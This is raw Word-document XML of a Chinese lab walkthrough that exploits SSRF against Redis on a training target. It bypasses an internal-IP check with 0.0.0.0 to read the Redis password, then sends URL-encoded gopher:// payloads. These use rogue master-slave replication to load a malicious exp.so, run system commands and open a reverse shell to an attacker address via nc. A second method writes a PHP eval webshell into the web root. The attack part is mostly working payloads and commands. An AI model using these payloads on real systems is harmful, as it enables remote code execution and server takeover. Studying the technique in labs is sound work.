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ssrfredis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSRF+Redis</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="63" w:name="利用方式1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用方式1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="访问靶机"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问靶机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3304953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获取redis密码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取redis密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用0.0.0.0的ip地址绕过check_inner_ip()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数，访问hint.php得到redis密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php?url=http://0.0.0.0/hint.php
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码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root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1218163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用本地主从复制打它，利用目录为万能的/tmp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="31" w:name="攻击机开启主服务器"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机开启主服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下载前面用到的两个工具，</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/n0b0dyCN/redis-rogue-server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redis-rogue-server，未授权使用</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server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Awsome-Redis-Rogue-Server，有授权使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将redis-rogue-server的exp.so文件复制到Awsome-Redis-Rogue-Server中，使用Awsome-Redis-Rogue-Server工具开启主服务，并且恶意so文件指定为exp.so，因为exp.so里面有system模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开启主服务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lport就是指定攻击机的ip和端口的，默认15000端口，-v和-path前面说过了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python3 redis_rogue_server.py -v -path exp.so -lport 21000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1428427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ssrf-gopher联动redies拿flag"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ssrf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher联动redies拿flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload中第一行就是payload，下面的是解码结果方便查看。%0a是换行，%250a是因为%编码之后是%25（都是url编码两次）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然后我把自己的攻击机服务器的ip地址改成了1.xx.xx.xx，记得改回来，全局替换即可</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="36" w:name="设置备份路径-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置备份路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config set dir /tmp/
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1006878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加载expso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载exp.so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新登录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成一个exp.so文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在进行主从同步（ip改为本地），退出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.1.100%252021000%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config set dbfilename exp.so
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">slaveof 192.168.1.100 21000
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1061140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执行之后，主从同步能够看到回显，会一直同步</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3380375"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="41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加载模块"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加载模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250amodule%2520load%2520./exp.so%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">module load ./exp.so
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1169689"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="45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9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关闭关闭主从同步"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关闭关闭主从同步</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250aslaveof%2520NO%2520ONE%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">slaveof NO ONE
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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关闭成功后主服务会停止同步，提示PONG啥的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3746204"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="49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6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执行系统命令"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250asystem.exec%2520"whoami"%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system.exec "whoami"
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1556813"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="53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反弹shell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">先在攻击机监听6666端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvvp 6666</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="688717"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="57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执行反弹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250asystem.rev%2520192.168.1.100%25206666%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system.rev 192.168.1.100 6666
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3367652"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="60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83" w:name="利用方式2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用方式2</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="67" w:name="设置备份路径-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置备份路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/var/www/html/%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config set dir /var/www/html/
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1389529"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="65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9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写入webshell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写入webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新登录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成一个webshell文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，退出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dbfilename%2520aa.php%250d%250aset%25201%2520'&lt;%253fphp @eval($_POST[1]);%253f&gt;'%250d%250asave%250d%250aquit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gopher://0.0.0.0:6379/_auth root
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config set dbfilename aa.php
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">set 1 '&lt;?php @eval($_POST[1]);?&gt;'
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">save
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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1422089"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="69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访问aaphp查看是否成功"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问aa.php查看是否成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.200/aa.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1053969"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="73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2" w:name="打开蚁剑连接webshell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打开蚁剑连接webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2942736"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="77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93528"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="80" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="F:\ZWXA\%E5%AE%9E%E9%AA%8C%E8%AF%BE%E4%BB%B6\02%20web%E5%AE%89%E5%85%A8\day16%20Unauthorized%20Access%20Control%20Vulnerability\ssrf_redis\images\1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2026-06-09T06:02:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-09T06:02:51Z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